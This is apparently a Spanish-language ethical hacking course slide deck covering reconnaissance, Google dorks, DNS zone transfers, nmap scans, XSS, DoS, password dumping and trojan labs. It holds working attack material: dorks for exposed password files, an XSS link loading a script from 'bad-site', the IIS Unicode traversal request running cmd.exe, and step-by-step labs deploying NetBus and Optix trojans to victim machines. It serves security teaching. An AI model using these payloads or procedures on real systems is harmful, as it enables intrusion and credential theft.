Técnicas de Prevención y
Ejecución de Hacking
Prof. Reinaldo N. Mayol Arnao
Fases de un Ethical Hacking
Reconocimiento

El levantamiento comienza por:

1. Búsqueda del nombre de dominio
(empresa.com)

2. Localización física de la empresa, direcciones,
teléfonos, direcciones de correo electrónico
Reconocimiento

3. Búsqueda sobre información de la empresa en google y
otros motores de búsqueda, blogs, noticias, foros, etc.
Búsqueda de versiones en páginas como www.archive.org

4. Búsqueda de Intranet, proyectos, versiones beta de la
empresa, conseguir acceso a la Intranet puede brindar
información valiosa de la misma.
◦ Normalmente, se pueden inferir los sitios internos de las
empresas:intranet.empresa.com,beta.empresa.com,
www2.empresa.com, etc.

5. Existen herramientas como DNS Enumerator, Spider
Foot, DNS Stuff que te ayudan a realizar la busque
Sección Práctica
Práctica:Archive.org
Ambiente: Cualquiera
Vaya al sitio Web: www.archive.org,
utilice la herramienta para buscar
versiones anteriores de su sitio web.
Sección Práctica
Sección Práctica
Así éramos el 21
Febrero del 2006
Sección Práctica
Práctica:Archive.org
Ambiente: Cualquiera
Vaya al sitio Web: www.archive.org,
utilice la herramienta para buscar
versiones anteriores de su sitio web.
Sección Práctica
Práctica:dnsstuff
Ambiente: Cualquiera
Google Hacking
Muchas aplicaciones mal instaladas, o instaladas por defecto, errores de
configuración, etc, terminan publicando información que no debería ser publica
en Internet. Esta información es indexada por los buscadores y por lo tanto,
terminan siendo disponibles para el ethical hacker o para el criminal
informático.
En particular, las capacidades avanzadas de búsqueda de google son
extraordinariamente flexibles. Las búsquedas comunes y corrientes contienen
texto a ser buscado en el cuerpo de la página Web.
Sin embargo, las búsquedas avanzadas pueden especificar tipos de archivos, textos
en distintas partes de la página no solo el cuerpo, patrones de números, firmas
de aplicaciones, etc.
Algunos modificadores de este tipo son:
Inurl: Texto en el URL de la pagina.
Intext: Texto libre.
Site: Especifica un dominio.
Filetype: Tipo de archivos a buscar.
Google Hacking
Sección Práctica:
Obtener Cuentas:
inurl:account filetype:xls
Obtener passwords:
inurl:passwords filetype:xls
Obtener info sobre sistemas:
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
Busqueda de dispositivos:
inurl:indexFrame.shtml Axis
intext:centreware inurl:status
(WebCams)
(Printers)
El sitio web donde todo esto ocurre se llama the Google Hacking Database:
http://johnny.ihackstuff.com/ghdb.php
Google Hacking
Análisis de Resultados:
El google hacking esta muy bien para los “hacks accidentales”.
Es bastante obvio que cuando estamos tratando de evaluar un sitio en
especifico, es imposible probar todos los posibles google hacks junto con el
modificador site:dominio.tld. Por cierto, justamente esta idea esta detrás del
famoso scanner “goolag” desarrolaldo hace poco por el cDc.
A pesar de que hicieron esta idea impractica en realidad, lo que sucede al
ejecutarla es que google bloquea nuestro IP por gran numero de búsquedas.
Sin embargo, goolag esta incluido en el CD de herramientas porque no deja de
ser una excelente compilación de “google dorks”.
Google Hacking
Práctica Número 8:
Instalar Goolag
Realizar un scan de unos cuantos google dorks para algún site externo.
Notar el número de scans antes de ser bloqueados.
* Es esto ilegal?
Notar la gran cantidad de google dorks recopilados.
Análisis de Resultados:
Por supuesto, los atacantes también saben esto y es irreal pensar que esto sucede en el
mundo real. Lo que sucede en el mundo real es que información es recopilada de
una forma mucho mas deterministica.
En los tiempos de antes, el evaluador y el atacante se sentarían a revisar cada uno de
los resultados de sus sofisticadas búsquedas para interpretar la información y
decidir cual era relevante o importante para su proyecto. Esto ya no es así. La
evolución del google Hacking se llama: Paterva.
Paterva – Maltego
Maltego es un programa que es capaz de determinar relaciones entre personas y
enlaces del mundo real entre:
Gente
Grupos de gente (Social networks)
Compañías
Sitios Web
Infraestructura de Internet tales como
- Dominios
- Nombres DNS
- Netblocks
- Direcciones IP.
Frases
Afiliaciones
Archivos y documentos.
Estas entidades son relacionadas utilizando inteligencia artificial
Paterva – Maltego
Sección Práctica
Utilizar Maltego para ver que información pueden obtener sobre personas,
organizaciones, correos electrónicos, etc.
http://maltego1.paterva.com/maltego-classic.html
Técnicas y herramientas de Hacking
En este momento ya tenemos un buen número de herramientas para recopilar
información de nuestros objetivos.
A partir de todas las técnicas anteriores debemos tener unos cuantos nombres
de dominio, rangos de direcciones IP, etc.
Con estos pedazos de información es momento de
empezar a determinar puntos débiles en concreto en
donde podamos ejecutar técnicas específicas para
violar mecanismos de protección.
Si reflexionamos un poco sobre todo lo anterior, no se ha
violentado ninguna tecnología, no se ha abusado de
ningún privilegio. Toda la información obtenida ha
sido recopilada por medios públicamente disponibles.
El siguiente grupo de herramientas nos empieza a llevar a
una zona mas gris.
Técnica de Zone Transfer
Sección Práctica:
Ejecutar un ataque de transferencia de zona con nslookup.
nslookup
set type=NS
dominio.com
server servidordns.dominio.com
set type=any
ls –d dominio.com
Todos los dominios bien configurados deben responder con un “transacción rehusada”.
En caso contrario esta secuencia de comandos nos devuelve una lista de hosts con
sus nombres de acuerdo a los records del servidor DNS que fue preguntado.
Algunos servidores DNS también pueden responder con datos incorrectos para despistar
atacantes. Salvo casos muy especiales, las transferencias de zonas no deberían
permitirse a la internet en general.
Fase 2: Rastreo


En esta etapa el atacante intenta descubrir,
enumerar e inventariar los equipos de la red a la
que quiere acceder.
Específicamente, el atacante desea recolectar
información acerca de las direcciones IP, su
sistema operativo, la arquitectura de sistemas de
la víctima y los servicios que cada equipo de su
red está ejecuta.
Objetivo de la fase de rastreo
Un viejo amigo: NMAP
Tipo de rastreos de NMAP
Tipo de rastreos de NMAP

Syn Stealth o Half Open:
◦ Se envía un paquete SYN a un puerto del equipo, lo que
sugiere que se está solicitando una conexión, una
respuesta es esperada.
◦ Si el puerto está abierto enviará un paquete SYN/ACK.
◦ Por el contrario, si el puerto está cerrado enviará un
paquete RST.

La ventaja de este tipo de escaneo es que muy
pocos sitios registran este tipo de actividad.
Tipo de rastreos de NMAP

FIN Scan:
◦ Sólo funciona con equipos con TCP/IP desarrollado de
acuerdo al RFC 793, si se realiza con Windows la
respuesta será que todos los puertos están cerrados.
◦ El escaneo consiste en enviar un FIN, si el puerto está
abierto se recibirá NO RESPONSE...si el puerto está cerrado
se recibirá un RST/ACK.
Tipo de rastreos de NMAP

NULL Scan:
◦ Este tipo de rastreo sólo funciona con equipos con
TCP/IP desarrollado de acuerdo al RFC 793. Si se
realiza con Windows la respuesta será que todos los
puertos están cerrados.
◦ El escaneo consiste en enviar un paquete sin banderas
configuradas, si el puerto está abierto se recibirá NO
RESPONSE...si el puerto está cerrado se recibirá un
RST/ACK
Tipo de rastreos de NMAP

Window Scan:

ICMP Echo Scan:

List Scan:
◦ Este rastreo es similar al ACK, la detección se realiza
revisando el tamaño de las ventanas.
◦ Esta opción no es realmente un tipo de rastreo dado que
ICMP tiene abstracción de puertos, pero es útil para
determinar qué equipos de una red están arriba haciendo ping.
◦ Este tipo de escaneo simplemente genera e imprime la lista de
Ips/nombres sin hacer ping o escaneo de puerto. En realidad
se realiza una resolución de nombres (DNS)
Tipo de rastreos de NMAP

Bounce Scan:
◦ Este tipo de rastreo utiliza la vulnerabilidad de los
servidores FTP para los ataques de bounce. Esta
vulnerabilidad permite que una persona solicite al
servidor FTP abrir una conexión con un tercero en un
puerto en particular. Cómo el atacante puede utilizar el
FTP también podrá recibir los resultados. El ataque
bounce es similar a la usurpación de IP (IP Spoofing).
◦ El anonimato del atacante se mantiene.
◦ También es bueno evadiendo cortafuegos y permite
acceso a redes locales.
Tipo de rastreos de NMAP

Reverse Ident Scan:
◦ El protocolo Ident permite que se muestren los usuarios
dueños de procesos conectados vía TCP, incluso si ese
proceso no comenzó la conexión.
◦ De esta forma una conexión puede establecerse por
HTTP y luego utilizar ident para identificar qué servidor
está corriendo como root.
Tipo de rastreos de NMAP

RPC Scan:
◦ Este método funciona en combinación con otros tipos de
rastreos de puertos.
◦ Funciona escaneando todos los puertos TCP/UDP y
luego los inunda con un programa de SunRPC con
comandos nulos en un intento de determinar si son
puertos RPC, si lo son, trata de determinar qué versión
tienen y programas están sirviendo.
Tipo de rastreos de NMAP

Blaster Scan:
◦ Este es un rastreo de puertos TCP sistemas para
basados en *nix.
◦ Realiza ping a los equipos para determinar conectividad,
escanea segmentos de red, accesos anónimos a
servidores FTP, vulnerabilidades CGI, POP3 y FTP (para
ataques de fuerza bruta).
Otras opciones importantes: decoys
¿Cómo se detecta el sistema operativo?
Sección Práctica
Práctica:p0f
Ambiente: Linux
P0f es una herramienta para obtener información remota
sobre el sistema operativo y versiones de servidor de una máquina.
Su principal característica es que no deja huella en los firewalls
y sistemas de detección de intrusos (a diferencia de ratreadores
de puertos activos como Nmap.)
1.Abra un shell en linux
2.Ejecute
• p0f –i <el número de interfaz de su tarjeta de red>
3.Abra un navegador (browser), observe los resultados.
Sección Práctica
Práctica:Cheops
Ambiente: Linux
Cheops es una herramienta para sistemas linux que permite
detección de sistemas operativos, servicios activos en una
red, escaneo de puertos, etc..
1.Abra un shell
2.Ejecute la herramienta ( simplemente ejecute el comando cheops)
Cheops
Búsqueda de Vulnerabilidades


Otro camino común utilizado en esta etapa es la
búsqueda de vulnerabilidades que puedan ser
explotables.
Existen innumerables herramientas que pueden ser
utilizadas para este fin.
Escondiéndose


Proxy: es un servidor que puede ser utilizado
cómo intermediario para conexiones con otros
equipos.
Es común utilizar servidores distribuidos por
varios países de forma es esconder el origen real
de la intrusión.
Buscando “free Proxy Servers”
TOR


Tor es una de las herramientas de proxy-socks mas
conocidas y utilizadas.
Funciona re-direccionando todo el tráfico a un servidor
anónimo y cifrando los datos entre ese servidor tor y el
cliente ( no entre el servidor tor y el destino)
TOR en acción
TOR…eando
Enumerando

El término enumeración se emplea para designar el proceso de
extracción de cuentas de usuario, privilegios de las cuentas,
nombres de equipo, etc.

Algunas técnicas de enumeración para la extracción de usuarios:





1. W2K
2. SNMP
3. Utilizando los IDs de correo electrónico
4. Extrayendo información con usuarios por omisión
5. Fuerza bruta contra directorio activo.
Sección Práctica
Práctica: getacc
Ambiente: Windows
Ejecute el programa Getacct ( get account) contra el
sistema víctima de su red.
NULL Sesion



Las sesiones nulas toman ventaja de una vulnerabilidad en
el CIFS/SMP (Common Internet File System/Server
Messaging Block).
Se puede establecer una sesión nula con un equipo de
Windows /(NT/2000), con un usuario nulo y su password.
Utilizando una sesión nula se puede recabar información
sobre el equipo como:
◦
◦
◦
◦
Lista de usuarios y grupos
Lista de equipos
Lista de servicios compartidos
Usuarios y SIDs (Security Identifier)
Fase 3: Toma de Control

Luego de lograr el acceso el hacker tratará de
escalar privilegios y ejecutar aplicaciones o
exploits de forma encubierta.

Una forma común de encubrimiento son los
rootkits. Los rootkits se instalan en el kernel y
tienen la habilidad de esconderse y encubrir sus
actividades.
Fase 3: Toma de Control

Cuando se instala un rootkit se reemplazan llamados
del sistema operativo por versiones o rutinas
modificadas que contienen la ejecución de script o
aplicación adicional al llamado natural que realiza la
función.

Un rootkit puede: Esconder procesos, archivos,
entradas en el registro interceptar comandos, solicitar
debug (causando los famosos pantallazos azules),
redirigir archivos .
¿Por qué son comprometidos los sitios Web?
¿Cómo son comprometidos?
(entre muchas causas)







Obtención de identidades mediante ataques de
“ hombre en el medio”.
Envenenamiento del Cache del DNS.
Explotando errores de los programas.
Explotando configuraciones incorrectas.
Envenenamiento de URL
Inyecciones SQL
DoS
Algunos ejemplos

Cross-Site Scripting
◦ En HTML, existen caracteres “especiales”, que se
utilizan para que el servidor y los navegadores puedan
diferenciar entre texto normal ( mostrado) y elementos
que proporcionan diferentes funcionalidades.
◦ Cross-Site Scripting es una vulnerabilidad que puede ser
explotada mediante la inserción de caracteres especiales
en la comunicación cliente-servidor, en forma de scripts,
contentivo de código malicioso.
Cross-Site Scripting, ejemplos

<A HREF= “http://sitio.com/comment.cgi?
mycomment=<SCRIPT>codigo-malicioso</SCRIPT>">
Click here</A>

<A HREF= “http://sitio.com/comment.cgi?
mycomment=<SCRIPT SRC=‘http://bad-site/badfile'>
</SCRIPT>"> Click here</A>
Una situación real



Imagine que ud. Ha recibido un correo electrónico
con una invitación a un paseo. Para ir al paseo,
ud. debe llenar un formulario con sus datos.
El email tiene un link que amablemente lo llevará
al formulario.
 El link tiene la forma
http://www.elpaseosoñado.com
El código del link dice:
www.victima.com/default.asp?name=<script>evilScript()</script>
Que sucede
Usuario Confiado…
Server Vulnerable
Usuario Envía Solicitud
Server Devuelve HTML con código
malicioso incluido ( el server cree que es el
nombre del usuario)
Usuario confiado pierde el
Control de su máquina, el código malicioso
Se lo ha entregado a un extraño
“Web Server Folder Transversal Vulnerability”


Esta vulnerabilidad permite a usuarios externos obtener
acceso a máquinas corriendo IIS 4.0 o IIS 5.0 a través de
URL’s “malformadas”
Ej:
◦ Microsoft IIS efectúa una verificación de seguridad sobre cada
CGI URL ejecutado para asegurar que el requerimiento no use
ninguna secuencia ‘../’
◦ Pero..
◦ Dado que la codificación Unicode del caracter ‘/’ es ‘%c0%af’, si
se reemplaza la secuencia ‘../’ por ‘..%c0%af’ este no será
rechazado por la verificación inicial, ya que dicho proceso no
encuentra ninguna ocurrencia de los caracteres ‘../’ sólo verá una
secuencia ‘..%c0%af’ válida.
GET/scripts/..%c0%af/winnt/system32/cmd.exe?/
c+dir=c:\ HTTP/1.0
¿Por qué ‘%c0%at?

‘%c0 es el código de la tabla Basic Latin
Pero, %af > %7f, lo
Que significa que el sistema
“da la vuelta” ,%80-%af=%2f
%2
F
El número
más grande
es %7f ( 127
D)
Otras vulnerabilidades “famosas”

RPC DCOM
◦ RPC (Remote Procedure Call o Llamada de
Procedimiento Remoto), es un protocolo utilizado por
Windows, que proporciona un mecanismo de
comunicación entre procesos internos, y que permite que
un programa ejecutándose en una computadora pueda
acceder a los servicios de otra, de manera transparente
para el usuario
Otras vulnerabilidades “famosas”
◦ Windows posee un servicio llamado DCOM (Distributed
Component Object Model o Modelo de Objeto
Componente Distribuido), que permite a los objetos
COM comunicarse entre a través de la red.
◦ Un atacante puede utilizar los puertos TCP/UDP 135
(RPC), 139 y 445 (NetBIOS), 593 (RPC/http), o cualquier
puerto habilitado por IIS para alcanzar los servicios
DCOM vulnerables.
Otras vulnerabilidades “famosas”
◦ Existen innumerables vulnerabilidades descritas y
explotables utilizando los servicios DCOM.
◦ Un atacante que tenga éxito en aprovecharse de
estas vulnerabilidades, podría ejecutar un código
capaz de tener todos los privilegios del sistema
local de un sistema afectado.
Sección Práctica
Práctica: RPC Exploit-GUI
Ambiente: MS. Windows
1-Ejecute la Herramienta RPC
E-Gui que le entregará el
instructor.
2-Localice a la víctima de su
ataque.
3- Ejecute el ataque. (SÓLO
UNA VEZ)
4- Evalúe la consecuencias del
mismo.

[email protected]:~$ echo -e "GET / HTTP/1.0\n\n" | nc -vv
www.XXXXXXX.COM 80
XXXXXXX.com.ve [XXX.XXX.XXX.116] 80 (www)
open
HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 02:21:22 GMT
Server: Apache/2.0.53 (Ubuntu) PHP/4.3.10-10ubuntu4.3
X-Powered-By: PHP/4.3.10-10ubuntu4.3
Connection: close
Content-Type: text/html
Robo de Contraseñas
Autenticación
El modelo más común de autenticación permite identificar a un
usuario, una aplicación o a un servicio utilizando una pareja de IDClave
En un contexto más amplio existen varios modelos adicionales de
autenticación:

Kerberos

Certificación Digital
Esquemas de Autenticación
Autenticación HTTP
• AutenticaciónBasica
• Digest Autenticación
Autenticación Windows (NTLM)
Autenticación con Certificados Digitales o Claves
RSA Secure Token
Biometría
Autenticación HTML Básica
Digest Authentication
La contraseña no se utiliza directamente en la autenticación, sino, por
ejemplo:

HA1 = MD5 (nombre de usuario: entorno: contraseña).
Se basa en el esquema reto- respuesta
Digest Authentication
Servidor de
Autenticación
Cliente
Servidor Envía Reto
Usuario envía Reto Cifrado
Servidor
compara reto
enviado con
reto recibido
LA CLAVE NUNCA PASA POR LA
RED!!
Usuario
Cifra
Reto con
Clave
Autenticación NTLM
Constituye una variante de la autenticación mediante resúmenes
criptográficos.
Se trata igualmente una forma segura de autenticación en la medida
en que no se envían ni la contraseña ni el nombre de usuario a través
de la red.


Sólo está soportado por Microsoft Internet Explorer, versión 2.0 o
posterior y servidores NT.
No funciona para conexiones con proxy.
¿Cómo ocurre la autenticación en redes Microsoft?
Cuando un usuario envía la orden para acceder a
\\maquina\recurso_compartido se efectúan los siguientes pasos:

Establecimiento de sesión TCP

Establecimiento de sesión NetBIOS

Negociación SMB (Server Message Block)

Autenticación Challenge-Response
SMB
SMB (Server Message Block) es el protocolo a nivel
capa Aplicación usado en las redes Microsoft.
Por razones de compatibilidad, los nuevos
sistemas operativos siempre “comprenden” a los
anteriores.
Durante la negociación el cliente envía la lista de
dialectos que comprende, el server selecciona uno
en común (normalmente el más nuevo) y devuelve
esa información al cliente.
Conjuntamente con esa información el servidor
envía el reto.
Kerberos
El servidor de Kerberos en Windows 2000 es un
Controlador de Dominio. Todos los controladores
de dominio Windows 2000 proveen el servicio
Kerberos a la red.
Kerberos está basado en la técnica de “SecretoCompartido”.
Si tanto cliente, como usuario y como server,
tienen cuenta en el dominio hay un secretocompartido entre cada uno de ellos y el
Controlador de Dominio.
Kerberos
Autenticación basada en Claves y Certificados
Ej. de extensiones
75
SSL
Usando
C. Asimétrica
|
D.Hellman
76
C.Simetrica
Sección Práctica
Práctica: PWDUMP, LC4
Ambiente: MS. Windows
LOS ELEMENTOS AQUÍ PLANTADOS SON SÓLO UNA
PRUEBA DE CONCEPTOS, NO DEBEN SER UTILIZADOS
CON OTROS FINES.
PWDump
Ejecute la herramienta en línea
de comando en su equipo.
Ejecute:
pwdump ip_del_equipo
ruta_de_archivo id
Cuando la herramienta le indique
completed busque en el sitio
donde guardo el archivo. En el
archivo tendrá un listado de
usuarios y un campo dónde podrá
visualizar el hash del password.
Utilice LC4
Una vez que ejecute la
herramienta importe el archivo
.txt que realizo con el pwdump
Ejecute la opción begin audit y
podrá descifrar el password
DoS
Tipos Generales
"flood"
“Man-in-the-middle
“Block Users”
“Block Services”
¿Como se inicia un DoS?
Se comienza un ataque de DoS explotando una vulnerabilidad en un
sistema informático.
Es del sistema principal que el intruso identifica y se comunica con
otros sistemas que puedan ser comprometidos.
La idea detrás de un ataque de este tipo es dejar fuera al sistema
víctima, principalmente por inanición de recursos.
La principal dificultad radica en detener el ataque y reconocer las
solicitudes apócrifas de las verdaderas.
Algunos Ataques de DoS
SYN flood
Supernuke/Winnuke
TCP FIN flood
Teardrop/Newtear
Connection flood
Paquetes fragmentados
Land Atack
Bucle UDP/Snork UDP
finger bomb
email bomb
MAC flooding
DNS flood
Tipos de Ataques
DoS : Ataque Individual de Negación de Servicios
DdoS: Ataque Distribuido de Negación de Servicios.
DoS y DDoS
Ping de la Muerte
A atacante deliberadamente envía datagramas IP mayores de los 64 KB
permitidos por el protocolo IP.
El proceso de fragmentación hace que el paquete sea “ picado” en
fragmentos. Cada fragmento su vez puede tener hasta 64 KB
El sistema operativo vulnerable no es capaz de manejar la situación y
falla.
Smurf
Enviar un paquete ICMP-Echo-Request a un‘SMURF amplifier’ network (Aclass broadcast address).
Todos los ordenadores de esa red responden a la dirección de origen
¿Qué es un Troyano?
Un Troyano es un pequeño programa que corre a escondidas y que infecta
a un computador.
Con la ayuda de un Troyano, un atacante puede obtener acceso a
passwords, modificar parámetros de operación de la computadora
infectada, etc.
Tipos de Troyanos
Security Software Disablers
Destructive
Remote Access
Data-Sending
Denial-of-Service (DoS) Attack
Proxy
Puertos utilizados por (algunos)
troyanos
Back Orifice
31337-38 /UDP
Deep Throat
2140, 3150/UDP
NetBus
12345,12346/TCP
NetBus 2 Pro
20034/TCP
Back Orifice
31337-38 /UDP
Sección Prácticas
Práctica: NetBUS
Ambiente: MS. Windows
LOS ELEMENTOS AQUÍ PLANTADOS SON SÓLO UNA PRUEBA DE
CONCEPTOS, NO DEBEN SER UTILIZADOS CON OTROS FINES.
NetBUS
El instructor le entregará una máquina virtual a la que
llamaremos víctima.
En la máquina “ atacante” , la suya, encontrará un carpeta
llamanda netbus.
Existen 2 archivos importantes: NetBUS.exe (CLIENTE, Ud.) y
PATH. Exe ( SERVIDOR, su víctima) NO EJECUTE PATH EN SU
MAQUINA!!!!
Envíe el archivo path.exe a la máquina víctima, espere a que
se ejecute.
Ahora ejecute ud. netbus y ponga la IP de su víctima.
NetBus
Sección Prácticas
Práctica: Optix
Ambiente: MS. Windows
LOS ELEMENTOS AQUÍ PLANTADOS SON SÓLO UNA PRUEBA DE
CONCEPTOS, NO DEBEN SER UTILIZADOS CON OTROS FINES.
Optix
Con optix, construiremos tanto un cliente como un servidor, al igual
que con el netbus abra que hacer llegar una parte a la víctima.
CUIDADO!!! NO CORRA EL PROGRAMA QUE CONTRUYA CON BUILDER EN
SU PROPIA MAQUINA O LA INFECTARÁ
Optix: Builder
Optix: Builder
Luego de
elegir las
opciones que
desee,
construya el
troyano.
RECUERDE NO EJECUTAR EL PROGRAMA CREADO EN
SU MAQUINA
Optix: Client
RECUERDE...
Las anteriores demostraciones sólo tienen
como objetivo probar conceptos, no las utilice
en otras situaciones o podría incurrir en delitos
Sección Prácticas
Práctica: Super Helper Tool
Ambiente: MS. Windows
Esta es una herramienta que permite verificar los procesos que están
corriendo de manera independiente al sistema operativo, detectar y
detener troyanos y virus.
NetBUS
Sección Prácticas
Práctica: xxxxxxxxxxx
Ambiente: xxxx
LOS ELEMENTOS AQUÍ PLANTADOS SON SÓLO UNA
PRUEBA DE CONCEPTOS, NO DEBEN SER UTILIZADOS
CON OTROS FINES.
• Presione simultáneamente las
teclas WINDOWS y R en la
máquina virtual que hemos
utilizado de atacante.
•¿Sorprendido?
Descargar

Módulo 2: Ataques a Sitios Web